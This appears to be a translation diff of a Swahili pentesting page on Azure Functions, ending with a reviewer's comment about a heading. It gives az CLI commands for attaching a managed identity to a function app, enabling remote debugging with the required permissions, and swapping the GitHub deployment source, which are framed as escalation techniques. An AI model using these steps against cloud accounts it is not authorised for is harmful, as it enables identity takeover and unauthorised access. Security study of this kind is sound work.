```bash
|
||||
az functionapp identity assign \
|
||||
--name <app-name> \
|
||||
--resource-group <res-group> \
|
||||
--identities /subscriptions/<subs-id>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<mi-name>
|
||||
```
|
||||
### Remote Debugging
|
||||
### Urekebishaji wa Mbali
|
||||
|
||||
Ni uwezekano wa kuungana ili kudhibiti kazi inayotembea ya Azure kama [**ilivyoelezwa katika nyaraka**](https://learn.microsoft.com/en-us/azure/azure-functions/functions-develop-vs). Hata hivyo, kwa kawaida Azure itazima chaguo hili baada ya siku 2 ikiwa mendelevu atasahau ili kuepuka kuacha usanidi dhaifu.
|
||||
Inawezekana pia kuunganishwa ili kudebug Function inayotumika kama [**explained in the docs**](https://learn.microsoft.com/en-us/azure/azure-functions/functions-develop-vs). Hata hivyo, kwa chaguo-msingi Azure itazima chaguo hili ndani ya siku 2 ikiwa msanidi programu atakosa, ili kuepuka kuacha usanidi wenye udhaifu.
|
||||
|
||||
Ni uwezekano wa kuangalia ikiwa Kazi ina udhibiti ulioanzishwa na:
|
||||
Inawezekana kuangalia ikiwa Function imewezeshwa debugging kwa:
|
||||
```bash
|
||||
az functionapp show --name <app-name> --resource-group <res-group>
|
||||
```
|
||||
Kuwa na ruhusa `Microsoft.Web/sites/config/write` pia inawezekana kuweka kazi katika hali ya ufuatiliaji (amri ifuatayo pia inahitaji ruhusa `Microsoft.Web/sites/config/list/action`, `Microsoft.Web/sites/config/Read` na `Microsoft.Web/sites/Read`).
|
||||
Kuwa na ruhusa `Microsoft.Web/sites/config/write` pia inawezekana kuweka function katika debugging mode (amri ifuatayo pia inahitaji ruhusa `Microsoft.Web/sites/config/list/action`, `Microsoft.Web/sites/config/Read` na `Microsoft.Web/sites/Read`).
|
||||
```bash
|
||||
az functionapp config set --remote-debugging-enabled=True --name <app-name> --resource-group <res-group>
|
||||
```
|
||||
### Badilisha Github repo
|
||||
|
||||
Nilijaribu kubadilisha Github repo ambapo kutekelezwa kunafanyika kwa kutekeleza amri zifuatazo lakini hata kama ilibadilika, **msimbo mpya haukupakuliwa** (labda kwa sababu inatarajia Github Action kuboresha msimbo).\
|
||||
Zaidi ya hayo, **kitambulisho cha usimamizi wa shirikisho hakikubadilishwa** kuruhusu hazina mpya, hivyo inaonekana kwamba hii si ya manufaa sana.
|
||||
Nilijaribu kubadilisha Github repo kutoka ambapo deploying inafanyika kwa kutekeleza amri zifuatazo lakini hata kama ilibadilika, **the new code was not loaded** (labda kwa sababu inatarajia Github Action kusasisha code).\
|
||||
Zaidi ya hayo, **managed identity federated credential wasn't updated** kuruhusu repo mpya, hivyo inaonekana hii sio ya msaada.
|
||||
```bash
|
||||
# Remove current
|
||||
az functionapp deployment source delete \
|
||||
|
||||
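Review bot: the `### Remote Debugging` heading is translated to `### Urekebishaji wa Mbali` while every other heading in the file (the permission-name headings, `### Badilisha Github repo`) keeps the English feature name, and the new body text itself uses "debugging" and "debugging mode"; translating it also changes the heading anchor for any link into this section, so keep `Remote Debugging`.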